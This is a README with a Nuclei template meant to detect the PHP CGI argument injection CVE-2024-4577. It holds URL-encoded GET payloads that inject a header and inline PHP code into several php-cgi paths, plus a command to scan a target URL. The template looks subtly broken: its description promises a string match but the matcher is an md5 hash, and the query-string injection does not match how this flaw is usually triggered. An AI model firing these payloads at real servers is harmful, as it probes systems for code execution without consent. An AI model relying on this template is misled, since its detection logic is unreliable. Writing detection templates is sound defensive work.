This repository contains a Nuclei template to detect the PHP CGI Argument Injection vulnerability identified as CVE-2024-4577.
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 PHP CGI Argument Injection Vulnerability.
This template checks if the response contains "CVE_2024_4577_TEST" indicating a successful injection.
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE_2024_4577_TEST\";?>"
- "{{BaseURL}}/cgi-bin/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE_2024_4577_TEST\";?>"
- "{{BaseURL}}/php-cgi/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE_2024_4577_TEST\";?>"
- "{{BaseURL}}/php-cgi/php.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE_2024_4577_TEST\";?>"
- "{{BaseURL}}/index.php?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20echo%20\"CVE_2024_4577_TEST\";?>"
matchers:
- type: md5
hash: 83946a388fdf6cd2707eed8550575a76To use this template with Nuclei, save the template content into a file named CVE-2024-4577.yaml and run the following command:
nuclei -t CVE-2024-4577.yaml -u <target-url>Replace <target-url> with the URL of the target you want to scan.
For any inquiries or further information, you can reach out to me through: